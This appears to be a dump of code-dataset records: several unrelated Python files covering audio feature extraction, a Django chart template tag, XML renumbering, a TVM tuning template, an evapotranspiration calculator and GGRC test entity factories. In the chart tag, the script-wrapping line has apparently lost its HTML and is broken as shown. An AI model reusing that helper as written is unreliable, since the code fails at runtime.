mel_spectrogram_matrix = melspectrogram(y=data, sr=sr, n_fft=frame_length, hop_length=hop_length,\n power=1.0, n_mels=meta.mel_band_num)\n\n # add zeros to prepare for stacking\n padding_matrix = np.zeros((meta.mel_band_num, meta.lr_stack_frame_num))\n padded_mel_spectrogram_matrix = np.concatenate((padding_matrix, mel_spectrogram_matrix, padding_matrix),\n axis=1)\n\n # stack several consecutive frames together\n stack_frames_num = 2 * meta.lr_stack_frame_num + 1\n feature_matrix = np.zeros((meta.feature_dim, mel_spectrogram_matrix.shape[1]))\n for i in range(mel_spectrogram_matrix.shape[1]):\n feature_matrix[:, i] = padded_mel_spectrogram_matrix[:, i:i + stack_frames_num].T.reshape((1, -1))\n\n # save the feature matrix\n print('Saving feature matrix with shape {}.'.format(feature_matrix.shape))\n feature_file_path = dst_dir / audio_file_path.stem\n np.save(str(feature_file_path), feature_matrix)\n\n if str(audio_file_path.name).startswith('test'):\n break\n\n if meta.version == '2017.3':\n generate_feature_matrix(meta.audio_file_dir, meta.feature_file_dir)\n else: # meta.version == '2016.2':\n generate_feature_matrix(meta.train_audio_file_dir, meta.train_feature_file_dir)\n # generate_feature_matrix(meta.dev_audio_file_dir, meta.dev_feature_file_dir)\n generate_feature_matrix(meta.test_audio_file_dir, meta.test_feature_file_dir)\n # 
generate_feature_matrix(meta.noisy_audio_file_dir, meta.noisy_feature_file_dir)\n print('Feature extraction done.')\n\n @classmethod\n def generate_groundtruth_matrix(cls):\n \"\"\"\n Generate the groundtruth matrices from the annotation files.\n :return: None\n \"\"\"\n def generate_groundtruth_matrix(src_dir, dst_dir, feature_dir):\n \"\"\"\n Generate the groundtruth matrices from the annotation files in src_dir and save to dst_dir.\n\n :param src_dir: Path object, the directory where annotation files are saved\n :param dst_dir: Path object, the directory where groundtruth matrices are going to be saved\n :param feature_dir: Path object, the directory where feature matrices are saved\n :return: None\n \"\"\"\n # create the folder if not exists\n os.makedirs(dst_dir, exist_ok=True)\n\n # groundtruth matrix generation\n for annotation_file_path in src_dir.iterdir():\n print('Processing {}.'.format(annotation_file_path.name))\n\n # read the annotation file\n with open(annotation_file_path) as f:\n lines = f.readlines()\n lines = [line.rstrip().split('\\t') for line in lines]\n\n # load the feature matrix and initialize the groundtruth matrix based on its shape\n feature_file_path = str(feature_dir / annotation_file_path.stem) + '.npy'\n feature_matrix = np.load(feature_file_path)\n groundtruth_matrix = np.zeros((len(meta.class_dict), feature_matrix.shape[1]))\n\n # handle the annotation line by line\n for line in lines:\n # read the annotation detail\n if meta.version == '2017.3':\n start_time = float(line[2])\n end_time = float(line[3])\n class_name = line[4]\n else: # meta.version == '2016.2':\n start_time = float(line[0])\n end_time = float(line[1])\n class_name = line[2]\n class_index = meta.class_dict[class_name]\n\n # compute the start and end frame index\n start_index = int(start_time / meta.hop_time_length)\n end_index = int(end_time / meta.hop_time_length)\n\n # set the corresponding element in groundtruth matrix to 1\n groundtruth_matrix[class_index, start_index:end_index + 1] = 1\n\n # save the groundtruth matrix\n groundtruth_file_path = dst_dir / annotation_file_path.stem\n np.save(str(groundtruth_file_path), groundtruth_matrix)\n\n if meta.version == '2017.3':\n generate_groundtruth_matrix(meta.annotation_file_dir, meta.groundtruth_file_dir, meta.feature_file_dir)\n else: # meta.version == '2016.2':\n generate_groundtruth_matrix(meta.dev_annotation_file_dir, meta.dev_groundtruth_file_dir, meta.dev_feature_file_dir)\n generate_groundtruth_matrix(meta.test_annotation_file_dir, meta.test_groundtruth_file_dir, meta.test_feature_file_dir)\n\n # generate groundtruth matrices for training set\n # create the folder if not exists\n os.makedirs(meta.train_groundtruth_file_dir, exist_ok=True)\n\n # groundtruth matrix generation\n for feature_file_path in meta.train_feature_file_dir.iterdir():\n # find the name and index of the class\n class_index = None\n file_name = feature_file_path.stem\n for class_name in meta.class_dict:\n if str(file_name).startswith(class_name):\n class_index = meta.class_dict[class_name]\n break\n feature_matrix = np.load(feature_file_path)\n groundtruth_matrix = np.zeros((len(meta.class_dict), feature_matrix.shape[1]))\n groundtruth_matrix[class_index] = 1\n groundtruth_file_path = meta.train_groundtruth_file_dir / (file_name + '.npy')\n np.save(groundtruth_file_path, groundtruth_matrix)\n\n print('Groundtruth generation done.')\n\n @classmethod\n def initialize_cross_validation(cls):\n \"\"\"\n Compute and save the feature and groundtruth matrix based on the 
cross validation setup for 2017.3.\n\n :return: None\n \"\"\"\n if meta.version == '2017.3':\n # create the folder if not exists\n os.makedirs(meta.cross_validation_data_dir, exist_ok=True)\n\n # cross validation data generation\n for k in range(1, 1 + meta.k_fold_num):\n print('Processing fold {}/{}.'.format(k, meta.k_fold_num))\n\n train_txt_file_path = meta.evaluation_setup_file_dir / 'street_fold{}_train.txt'.format(k)\n test_txt_file_path = meta.evaluation_setup_file_dir / 'street_fold{}_test.txt'.format(k)\n train_feature_matrix = np.zeros((meta.feature_dim, 0))\n train_groundtruth_matrix = np.zeros((len(meta.class_dict), 0))\n test_feature_matrix = np.zeros_like(train_feature_matrix)\n test_groundtruth_matrix = np.zeros_like(train_groundtruth_matrix)\n\n # create the directory to store data if not exists\n data_dir = meta.cross_validation_data_dir\n\n # compute the feature and groundtruth matrix of training set\n with open(str(train_txt_file_path)) as f:\n lines = f.readlines()\n lines = [line.rstrip().split('\\t') for line in lines]\n last_audio_name = ''\n feature_matrix = np.zeros((0, 0))\n groundtruth_matrix = np.zeros((0, 0))\n for line in tqdm(lines):\n # read the detail\n audio_name = Path(line[0]).stem\n start_time = float(line[2])\n end_time = float(line[3])\n\n # compute the start and end frame index\n start_index = int(start_time / meta.hop_time_length)\n end_index = int(end_time / meta.hop_time_length)\n\n # compute the new matrix\n if audio_name != last_audio_name:\n feature_matrix = np.load(str(meta.feature_file_dir / audio_name) + '.npy')\n groundtruth_matrix = np.load(str(meta.groundtruth_file_dir / audio_name) + '.npy')\n train_feature_matrix_temp = feature_matrix[:, start_index:end_index + 1]\n train_groundtruth_matrix_temp = groundtruth_matrix[:, start_index:end_index + 1]\n train_feature_matrix = np.concatenate((train_feature_matrix, train_feature_matrix_temp), axis=1)\n train_groundtruth_matrix = np.concatenate((train_groundtruth_matrix, train_groundtruth_matrix_temp),\n axis=1)\n\n # compute the feature and groundtruth matrix of test set\n with open(str(test_txt_file_path)) as f:\n lines = f.readlines()\n lines = [line.rstrip().split('\\t') for line in lines]\n for line in tqdm(lines):\n audio_name = Path(line[0]).stem\n test_feature_matrix_temp = np.load(str(meta.feature_file_dir / audio_name) + '.npy')\n test_groundtruth_matrix_temp = np.load(str(meta.groundtruth_file_dir / audio_name) + '.npy')\n test_feature_matrix = np.concatenate((test_feature_matrix, test_feature_matrix_temp), axis=1)\n test_groundtruth_matrix = np.concatenate((test_groundtruth_matrix, test_groundtruth_matrix_temp),\n axis=1)\n\n # save the matrices\n train_feature_matrix_file_name = data_dir / 'fold{}_train_feature'.format(k)\n train_groundtruth_matrix_file_name = data_dir / 'fold{}_train_groundtruth'.format(k)\n test_feature_matrix_file_name = data_dir / 'fold{}_test_feature'.format(k)\n test_groundtruth_matrix_file_name = data_dir / 'fold{}_test_groundtruth'.format(k)\n np.save(str(train_feature_matrix_file_name), train_feature_matrix)\n np.save(str(train_groundtruth_matrix_file_name), train_groundtruth_matrix)\n np.save(str(test_feature_matrix_file_name), test_feature_matrix)\n np.save(str(test_groundtruth_matrix_file_name), test_groundtruth_matrix)\n\n @classmethod\n def initialize_test_data(cls):\n \"\"\"\n Create simple data for test purpose for 2017.3.\n\n :return: None\n \"\"\"\n if meta.version == '2017.3':\n k = 1\n\n # two classes selected for testing purpose (class 0 and 
class 1)\n start_test_class_index = 0\n end_test_class_index = 2\n\n train_txt_file_path = meta.evaluation_setup_file_dir / 'street_fold{}_train.txt'.format(k)\n test_txt_file_path = meta.evaluation_setup_file_dir / 'street_fold{}_test.txt'.format(k)\n train_feature_matrix = np.zeros((meta.feature_dim, 0))\n train_groundtruth_matrix = np.zeros((len(range(start_test_class_index, end_test_class_index)), 0))\n test_feature_matrix = np.zeros_like(train_feature_matrix)\n test_groundtruth_matrix = np.zeros_like(train_groundtruth_matrix)\n\n # create the directory to store data if not exists\n data_dir = meta.cross_validation_data_dir\n\n # compute the feature and groundtruth matrix of training set\n with open(str(train_txt_file_path)) as f:\n lines = f.readlines()\n lines = [line.rstrip().split('\\t') for line in lines]\n last_audio_name = ''\n original_feature_matrix = np.zeros((0, 0))\n original_groundtruth_matrix = np.zeros((0, 0))\n for line in tqdm(lines):\n # read the detail\n audio_name = Path(line[0]).stem\n start_time = float(line[2])\n end_time = float(line[3])\n class_name = line[4]\n class_index = meta.class_dict[class_name]\n\n # only consider selected classes\n if class_index not in range(start_test_class_index, end_test_class_index):\n continue\n\n # compute the start and end frame index\n start_index = int(start_time / meta.hop_time_length)\n end_index = int(end_time / meta.hop_time_length)\n\n # compute the new matrix\n if audio_name != last_audio_name:\n original_feature_matrix = np.load(str(meta.feature_file_dir / audio_name) + '.npy')\n original_groundtruth_matrix = np.load(str(meta.groundtruth_file_dir / audio_name) + '.npy')\n train_feature_matrix_temp = original_feature_matrix[:, start_index:end_index + 1]\n train_groundtruth_matrix_temp = original_groundtruth_matrix[start_test_class_index:end_test_class_index, start_index:end_index + 1]\n train_feature_matrix = np.concatenate((train_feature_matrix, train_feature_matrix_temp), axis=1)\n train_groundtruth_matrix = np.concatenate((train_groundtruth_matrix, train_groundtruth_matrix_temp), axis=1)\n\n # compute the feature and groundtruth matrix of test set\n with open(str(test_txt_file_path)) as f:\n lines = f.readlines()\n lines = [line.rstrip().split('\\t') for line in lines]\n for line in tqdm(lines):\n audio_name = Path(line[0]).stem\n test_feature_matrix_temp = np.load(str(meta.feature_file_dir / audio_name) + '.npy')\n test_groundtruth_matrix_temp = np.load(str(meta.groundtruth_file_dir / audio_name) + '.npy')[start_test_class_index:end_test_class_index, :]\n for i in tqdm(range(test_feature_matrix_temp.shape[1])):\n # only consider selected classes\n if test_groundtruth_matrix_temp[:, i].sum() == 0:\n continue\n\n test_feature_matrix = np.concatenate((test_feature_matrix, test_feature_matrix_temp[:, i].reshape(-1, 1)), axis=1)\n test_groundtruth_matrix = np.concatenate((test_groundtruth_matrix, test_groundtruth_matrix_temp[:, i].reshape(-1, 1)), axis=1)\n\n # save the matrices\n k = 0\n train_feature_matrix_file_name = data_dir / 'fold{}_train_feature'.format(k)\n train_groundtruth_matrix_file_name = data_dir / 'fold{}_train_groundtruth'.format(k)\n test_feature_matrix_file_name = data_dir / 'fold{}_test_feature'.format(k)\n test_groundtruth_matrix_file_name = data_dir / 'fold{}_test_groundtruth'.format(k)\n np.save(str(train_feature_matrix_file_name), train_feature_matrix)\n np.save(str(train_groundtruth_matrix_file_name), train_groundtruth_matrix)\n np.save(str(test_feature_matrix_file_name), test_feature_matrix)\n 
np.save(str(test_groundtruth_matrix_file_name), test_groundtruth_matrix)\n\n @classmethod\n def generate_noisy_data(cls, noise_file_path='noise.wav'):\n deformer = BackgroundNoise(files=noise_file_path, n_samples=1, weight_max=0.21, weight_min=0.19)\n for audio_file_path in meta.train_audio_file_dir.iterdir():\n print('Processing {}.'.format(audio_file_path.name))\n jam_in = muda.load_jam_audio(jams.JAMS(), str(audio_file_path))\n jam_out = deformer.transform(jam_in)\n for result in jam_out:\n muda.save(str(meta.noisy_audio_file_dir / audio_file_path.name), 'temp.jams', result)\n\n\nif __name__ == '__main__':\n initializer = Initializer()\n # initializer.generate_noisy_data()\n # initializer.generate_feature_matrix()\n # initializer.generate_groundtruth_matrix()\n initializer.initialize_cross_validation()\n # initializer.initialize_test_data()\n","sub_path":"Initializer_oo.py","file_name":"Initializer_oo.py","file_ext":"py","file_size_in_byte":17562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"375480336","text":"import sys\nfrom django.core.urlresolvers import reverse\nfrom django import template\nfrom django.http import HttpRequest, HttpResponseForbidden\nfrom djchart.models import Chart\nfrom djchart.views import chart_data\n\nregister = template.Library()\n\ndef insert_chart_internals(pk, el_id, ajax=False):\n\ttry:\n\t\tchart = Chart.objects.get(pk=pk)\n\texcept:\n\t\treturn ''\n\tdef script(script_text):\n\t\treturn '' \\\n\t\t\t% script_text\n\tif ajax:\n\t\treturn script('ajaxChart(\"%(id)s\", \"%(path)s\", %(options)s);'\n\t\t\t% {\n\t\t\t\t'id': unicode(el_id),\n\t\t\t\t'path': reverse('chart_data', kwargs={'chart_pk': pk}),\n\t\t\t\t'options': any(chart.options) and chart.options or 'null',})\n\telse:\n\t\tdata_response = chart_data(HttpRequest(), pk)\n\t\tif isinstance(data_response, HttpResponseForbidden):\n\t\t\treturn ''\n\t\treturn script('$.jqplot(\"%(id)s\", %(data)s, %(options)s);'\n\t\t\t% {\n\t\t\t\t'id': unicode(el_id),\n\t\t\t\t'data': data_response.content,\n\t\t\t\t'options': any(chart.options) and chart.options or 'null',})\n\n@register.simple_tag\ndef insert_chart(pk, el_id, ajax=False):\n return insert_chart_internals(pk, el_id, ajax)\n","sub_path":"templatetags/chart_tags.py","file_name":"chart_tags.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"499568180","text":"# encoding=utf8\nimport xml.etree.ElementTree as ET\nimport shutil\nimport os\nimport zipfile\nimport json\nimport re\nfrom tqdm import tqdm\nimport requests.api\nfrom optparse import OptionParser\nfrom XmlDataLoader import XmlDataLoader\n\n# 利用logging.basicConfig()打印信息到控制台\nimport logging\nlogging.basicConfig(\n format='%(asctime)s [%(levelname)s] [%(pathname)s:%(lineno)d] [%(module)s] [%(funcName)s] >> %(message)s',\n level=logging.DEBUG\n)\n\n# 关闭requests的日志\nlogging.getLogger(\"requests\").setLevel(logging.WARNING)\nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING)\n\n\ndef load_en2chs(file):\n xdict = dict()\n f = open(file) # 返回一个文件对象\n line = f.readline() # 调用文件的 readline()方法\n while line:\n # print line, # 后面跟 ',' 将忽略换行符\n # print(line, end = '') # 在 Python 3中使用\n info = json.loads(line)\n xdict[info['en']] = info['chs']\n\n line = f.readline()\n f.close()\n return xdict\n\n\nif __name__ == \"__main__\":\n usage = ''\n parser = OptionParser(usage)\n parser.add_option(\"--dat\")\n parser.add_option(\"--output_xml\")\n\n 
(options, args) = parser.parse_args()\n\n xml_data_loader = XmlDataLoader()\n tree = xml_data_loader.load_xml_tree(options.dat)\n data = xml_data_loader.load(options.dat)\n\n count = 0\n index = 0\n no_chs_list = list()\n tree_games = tree.findall('games/game')\n pbar = tqdm(data['game_list'], ascii=True)\n for game in pbar:\n pbar.set_description(\"处理 %s\" % xml_data_loader.genGameName(game))\n pbar.update()\n\n count = count + 1\n # if count > 10:\n # break\n\n tree_game = tree_games[index]\n tree_game.find('releaseNumber').text = str(index + 1)\n tree_game.find('imageNumber').text = str(index + 1)\n # logging.info('releaseNumber: %s', tree_game.find('releaseNumber').text)\n # logging.info('imageNumber: %s', tree_game.find('imageNumber').text)\n index = index + 1\n pbar.close()\n\n if options.output_xml:\n xml_str = ET.tostring(tree, encoding='utf-8')\n xml_str = str(xml_str, encoding='utf-8')\n xml_file = open(options.output_xml, 'w', encoding='utf-8')\n xml_file.write(xml_str)\n xml_file.close()\n","sub_path":"scripts/OffLineList2playlist/datutils/XmlRenameGameNum.py","file_name":"XmlRenameGameNum.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"60732332","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations\n# under the License.\n# pylint: disable=invalid-name, unused-argument\n\"\"\"Compute definition for fused_conv2d with cuda backend\"\"\"\nimport tvm\nfrom tvm import autotvm\n\nfrom ..fusion_composer import FusionComposer\n\n@autotvm.template('fused_conv2d.cuda')\ndef get_schedule_tuning_cuda(parameters):\n target = tvm.target.Target('cuda')\n fc = FusionComposer(parameters, target=target)\n\n # Get schedule\n schedule = fc.get_schedule(tuning=True)\n\n # Get compute\n compute = fc.get_compute()\n input_tensors = fc.make_placeholders()\n output_tensor = compute(input_tensors)\n all_tensors = input_tensors + [output_tensor]\n\n s = schedule(output_tensor)\n return s, all_tensors\n","sub_path":"python/tvm/topi/cuda/fused_conv2d.py","file_name":"fused_conv2d.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"357136623","text":"import numpy as np\nimport pandas as pd\nimport math\n\nfile = input('Choose a csv weather file with wind/RH/AirTemp/IncShortWaveRad:')\n#file = '/Users/mahanlab2/Desktop/Andrew Young/CT:ET models/PSWC_15minute_lubbock_2016_clean.csv'\ndf = pd.read_csv(file,header = 0)\n\n##Altitude for Lubbock Texas in meters\naltitude = float(992.4)\n##Assumed Albedo\nalbedo = float(0.23)\n##Stefan Boltzman Constant\nsbc = 2.042 * (10**-10)\n##Latent heat of vaporization (MJ/kg)\nlhv = 2.45\n##Atmosperic pressure (kPa)\ndf['Atmosperic_Pressure'] = 101.3*((293-0.0065*altitude)/293)**5.26\n##Psychometric Constant (kPA/C)\ndf['Psychometric_Constant'] = 0.000665*df['Atmosperic_Pressure']\n##Air temperature in C\ndf['Tair_C'] = df['avgt.C']\n##Air Temperature in K\ndf['Tair_K'] = df['Tair_C'] + 273.2\n##Air Speed average Column##\ndf['meanU.2m.m/s'] = df['wind.2m.m/s']\n##Slope (svp vs air temp)(kPa/C)\ndf['Slope'] = (2503 * np.exp(17.27*df['Tair_C']/(df['Tair_C']+237.3))/(df['Tair_C']+237.3)**2)\n#Saturated Vapor Pressure (kPa)\ndf['Saturated_Vapor_Pressure'] = 0.61078*np.exp((17.269*df['Tair_C'])/(237.3+df['Tair_C']))\n#Actual Vapor Pressure (kPa)\ndf['Actual_Vapor_Pressure'] = (df['avgRH.%']/100)*df['Saturated_Vapor_Pressure']\n#Vapor Pressure Deficit (kPa)\ndf['Vapor_pressure_deficit'] = df['Saturated_Vapor_Pressure']-df['Actual_Vapor_Pressure']\n#Net Shortwave Irradiance (W/m2)\ndf['Net_Shortwave_Irradiance'] = (1-albedo)*df['radn.W/m2']\n#Net Shortwave Irradiance (MJ/(m2*hour))\ndf['Net_Shortwave_Irradiance_MJ'] = df['Net_Shortwave_Irradiance']*(3600/1000000)\n#Net Outgoing Long Wave Irradiance (MJ/(m2*hour))\ndf['Net Outgoing Long Wave Irradiance (MJ/(m2*hour))'] = 0.8*sbc*(0.34-0.14*np.sqrt(df['Actual_Vapor_Pressure']))*df['Tair_K']**4\n#Net Outgoing Long Wave Irradiance (W/m2)\ndf['Net Outgoing Long Wave Irradiance (W/m2)'] = (df['Net Outgoing Long Wave Irradiance (MJ/(m2*hour))']/3600)*1000000\n#Net Irradiance in (W/m2) Rn\ndf['Rn_W/m2'] = df['Net_Shortwave_Irradiance'] - df['Net Outgoing Long Wave Irradiance (W/m2)']\n#Net Irradiance in (MJ/(m2*hour)) Rn\ndf['Rn_(MJ/(m2*hour))'] = df['Net_Shortwave_Irradiance_MJ'] - df['Net Outgoing Long Wave Irradiance (MJ/(m2*hour))']\n#Soil Heat Flux Density (W/m2)\ndf['Soil Heat Flux Density (W/m2)'] = 0.5 * df['Rn_W/m2']\n#Soil Heat Flux Density (MJ/(m2*hour))\ndf['Soil Heat Flux Density (MJ/(m2*hour))'] = df['Soil Heat Flux Density (W/m2)']*(3600/1000000)\n#numerator constant for hourly\ndf['Numerator Constant'] = 37\n###numerator constant for 
15-min###\n#df['Numerator Constant'] = 9.25\n##### Numerator constant for Daily Data #####\n#df['Numerator Constant'] = 900\n#Denominator Constant 0.96 for night and 0.24 for day for hourly rates\ndf['Denominator Constant'] = np.where(df['radn.W/m2'] >0, 0.24, 0.96)\n###Denominator Constant 0.24 for night and 0.06 for day for 15-min rates###\n#df['Denominator Constant'] = np.where(df['radn.W/m2'] >0, 0.06, 0.24)\n##### Denominator Constant 0.34 constant for Daily Data #####\n#df['Denominator Constant'] = 0.34\n#Reference ET Calculations mm/h (short crop)\ndf['Reference ET mm/hour'] = (0.408 * df['Slope'] * (df['Rn_(MJ/(m2*hour))'] - df['Soil Heat Flux Density (MJ/(m2*hour))']) + df['Psychometric_Constant'] * (df['Numerator Constant'] / (df['Tair_C'] + 273)) * df['meanU.2m.m/s'] * df['Vapor_pressure_deficit'])\\\n / ( df['Slope'] + df['Psychometric_Constant'] * ( 1 + (df['Denominator Constant'] * df['meanU.2m.m/s'])))\n#Reference ET Calculations MJ/(m2*hour) (short crop)\ndf['Reference ET (MJ/(m2*hour))'] = df['Reference ET mm/hour']*2.45\n#Sensible Heat\ndf['Sensible Heat (MJ/(m2*hour))'] = (df['Soil Heat Flux Density (MJ/(m2*hour))']+df['Rn_(MJ/(m2*hour))'])-df['Reference ET (MJ/(m2*hour))']\n#Energy Balance\ndf['Energy Balance'] = df['Soil Heat Flux Density (MJ/(m2*hour))'] + df['Rn_(MJ/(m2*hour))'] - df['Reference ET (MJ/(m2*hour))'] - df['Sensible Heat (MJ/(m2*hour))']\nprint(df[60:70])\n#df2 = df[['DOY','TimeNo24','year','Rn_W/m2','Rn_(MJ/(m2*hour))','Reference ET mm/h','Reference ET (MJ/(m2*hour))']].copy()\ndf2 = df[['DOY','Rn_W/m2','Rn_(MJ/(m2*hour))','Reference ET mm/hour','Reference ET (MJ/(m2*hour))']].copy()\ndata = ((df.groupby(['DOY'])['maxt.C'].max() + df.groupby(['DOY'])['mint.C'].min()) / 2) - 15.5\ndf3 = pd.DataFrame(data=data,columns= ['GDU_calc'])\ndf3['GDU_calc'] = np.where(df3['GDU_calc'] < 0, 0, df3['GDU_calc'])\ndf3['DOY'] = range(1, len(df3)+1)\ndf['Filter_Ref'] = np.where(df['Reference ET mm/hour'] < 0, 0, df['Reference ET mm/hour'])\ndf3['Daily Ref ET mm/hour'] = df.groupby(['DOY'])['Filter_Ref'].sum()\n#df3['Daily Ref ET mm/h Sum'] = df.groupby(['DOY'])['Filter_Ref'].sum()\n#df3['Daily Ref ET mm/hour'] = df3['Daily Ref ET mm/h'] * 24\n\ndf.to_csv(file + '_RefET.csv')\ndf2.to_csv(file + 'Rn_RefET.csv')\ndf3.to_csv(file + 'GDU.csv')","sub_path":"Hourly_ASCE_ET.py","file_name":"Hourly_ASCE_ET.py","file_ext":"py","file_size_in_byte":4756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"89023728","text":"# Copyright (C) 2017 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\"\"\"Factories that create entities.\"\"\"\n# pylint: disable=too-many-arguments\n# pylint: disable=invalid-name\n# pylint: disable=redefined-builtin\n\n\nimport copy\nimport random\n\nimport re\nfrom lib.constants import element, objects, roles, url as const_url\nfrom lib.constants.element import AdminWidgetCustomAttrs\nfrom lib.entities import entity\nfrom lib.utils import string_utils\nfrom lib.utils.string_utils import (random_list_strings, random_string,\n random_uuid)\n\n\nclass EntitiesFactory(object):\n \"\"\"Common factory class for entities.\"\"\"\n # pylint: disable=too-few-public-methods\n obj_person = objects.get_singular(objects.PEOPLE)\n obj_program = objects.get_singular(objects.PROGRAMS)\n obj_control = objects.get_singular(objects.CONTROLS)\n obj_audit = objects.get_singular(objects.AUDITS)\n obj_asmt_tmpl = objects.get_singular(objects.ASSESSMENT_TEMPLATES)\n obj_asmt = 
objects.get_singular(objects.ASSESSMENTS)\n obj_issue = objects.get_singular(objects.ISSUES)\n\n all_objs_attrs_names = tuple(entity.Entity().attrs_names_all_entities())\n\n @classmethod\n def update_obj_attrs_values(cls, obj, attrs_names=all_objs_attrs_names,\n **arguments):\n \"\"\"Update object's (obj) attributes values according to list of\n unique possible objects' names and dictionary of arguments (key = value).\n \"\"\"\n # pylint: disable=expression-not-assigned\n [setattr(obj, attr_name, arguments[attr_name]) for\n attr_name in attrs_names if arguments.get(attr_name)]\n return obj\n\n @classmethod\n def generate_title(cls, obj_type):\n \"\"\"Generate title according object type and random data.\"\"\"\n special_chars = string_utils.SPECIAL\n return \"{obj_type}_{uuid}_{rand_str}\".format(\n obj_type=obj_type, uuid=random_uuid(),\n rand_str=random_string(size=len(special_chars), chars=special_chars))\n\n @classmethod\n def generate_code(cls):\n \"\"\"Generate code according str part and random data.\"\"\"\n return \"{code}\".format(code=random_uuid())\n\n @classmethod\n def generate_email(cls, domain=const_url.DEFAULT_EMAIL_DOMAIN):\n \"\"\"Generate email according domain.\"\"\"\n return \"{mail_name}@{domain}\".format(\n mail_name=random_uuid(), domain=domain)\n\n\nclass PersonsFactory(EntitiesFactory):\n \"\"\"Factory class for Persons entities.\"\"\"\n\n @classmethod\n def default(cls):\n \"\"\"Create default system Person object.\"\"\"\n return cls.create(\n title=roles.DEFAULT_USER, id=1, href=const_url.DEFAULT_USER_HREF,\n email=const_url.DEFAULT_USER_EMAIL, authorizations=roles.SUPERUSER)\n\n @classmethod\n def create(cls, title=None, id=None, href=None, url=None, type=None,\n email=None, authorizations=None):\n \"\"\"Create Person object.\n Random values will be used for title aka name.\n Predictable values will be used for mail and system_wide_role.\n \"\"\"\n person_entity = cls._create_random_person()\n person_entity = cls.update_obj_attrs_values(\n obj=person_entity, title=title, id=id, href=href, url=url, type=type,\n email=email, authorizations=authorizations)\n return person_entity\n\n @classmethod\n def _create_random_person(cls):\n \"\"\"Create Person entity with randomly filled fields.\"\"\"\n random_person = entity.PersonEntity()\n random_person.title = cls.generate_title(cls.obj_person)\n random_person.type = cls.obj_person\n random_person.email = cls.generate_email()\n random_person.authorizations = roles.NO_ROLE\n return random_person\n\n\nclass CAFactory(EntitiesFactory):\n \"\"\"Factory class for Custom Attributes entities.\"\"\"\n\n @classmethod\n def create(cls, title=None, ca_type=None, definition_type=None, helptext=\"\",\n placeholder=None, multi_choice_options=None, is_mandatory=False,\n ca_global=True):\n \"\"\"Create CustomAttribute object.\n Random values will be used for title, ca_type, definition_type and\n multi_choice_options if they are None.\n \"\"\"\n ca_entity = cls._create_random_ca()\n ca_entity = cls._fill_ca_entity_fields(\n ca_entity, title=title,\n ca_type=ca_type, definition_type=definition_type, helptext=helptext,\n placeholder=placeholder, multi_choice_options=multi_choice_options,\n is_mandatory=is_mandatory, ca_global=ca_global)\n ca_entity = cls._normalize_ca_definition_type(ca_entity)\n return ca_entity\n\n @classmethod\n def _create_random_ca(cls):\n \"\"\"Create CustomAttribute entity with randomly filled fields.\"\"\"\n random_ca = entity.CustomAttributeEntity()\n random_ca.ca_type = 
random.choice(AdminWidgetCustomAttrs.ALL_ATTRS_TYPES)\n random_ca.title = cls.generate_title(random_ca.ca_type)\n random_ca.definition_type = random.choice(objects.ALL_CA_OBJECTS)\n return random_ca\n\n @classmethod\n def _fill_ca_entity_fields(cls, ca_object, **ca_object_fields):\n \"\"\"Set CustomAttributes object's attributes.\"\"\"\n if ca_object_fields.get(\"ca_type\"):\n ca_object.ca_type = ca_object_fields[\"ca_type\"]\n ca_object.title = cls.generate_title(ca_object.ca_type)\n if ca_object_fields.get(\"definition_type\"):\n ca_object.definition_type = ca_object_fields[\"definition_type\"]\n if ca_object_fields.get(\"title\"):\n ca_object.title = ca_object_fields[\"definition_type\"]\n # \"Placeholder\" field exists only for Text and Rich Text.\n if (ca_object_fields.get(\"placeholder\") and\n ca_object.ca_type in (AdminWidgetCustomAttrs.TEXT,\n AdminWidgetCustomAttrs.RICH_TEXT)):\n ca_object.placeholder = ca_object_fields[\"placeholder\"]\n if ca_object_fields.get(\"helptext\"):\n ca_object.helptext = ca_object_fields[\"helptext\"]\n if ca_object_fields.get(\"is_mandatory\"):\n ca_object.is_mandatory = ca_object_fields[\"is_mandatory\"]\n if ca_object_fields.get(\"ca_global\"):\n ca_object.ca_global = ca_object_fields[\"ca_global\"]\n # \"Possible Values\" - is a mandatory field for dropdown CustomAttribute.\n if ca_object.ca_type == AdminWidgetCustomAttrs.DROPDOWN:\n if (ca_object_fields.get(\"multi_choice_options\") and\n ca_object_fields[\"multi_choice_options\"] is not None):\n ca_object.multi_choice_options =\\\n ca_object_fields[\"multi_choice_options\"]\n else:\n ca_object.multi_choice_options = random_list_strings(list_len=3)\n return ca_object\n\n @classmethod\n def _normalize_ca_definition_type(cls, ca_object):\n \"\"\"Transform definition type to title form.\n Title from used for UI operations.\n For REST operations definition type should be interpreted as\n objects.get_singular().get_object_name_form().\n \"\"\"\n ca_object.definition_type = objects.get_normal_form(\n ca_object.definition_type\n )\n return ca_object\n\n\nclass ProgramsFactory(EntitiesFactory):\n \"\"\"Factory class for Programs entities.\"\"\"\n\n @classmethod\n def create_empty(cls):\n \"\"\"Create blank Program object.\"\"\"\n empty_program = entity.ProgramEntity()\n empty_program.type = cls.obj_program\n return empty_program\n\n @classmethod\n def create(cls, title=None, id=None, href=None, url=None, type=None,\n manager=None, primary_contact=None, code=None, state=None,\n last_update=None):\n \"\"\"Create Program object.\n Random values will be used for title and code.\n Predictable values will be used for type, manager, primary_contact, state.\n \"\"\"\n program_entity = cls._create_random_program()\n program_entity = cls.update_obj_attrs_values(\n obj=program_entity, title=title, id=id, href=href, url=url, type=type,\n manager=manager, primary_contact=primary_contact, 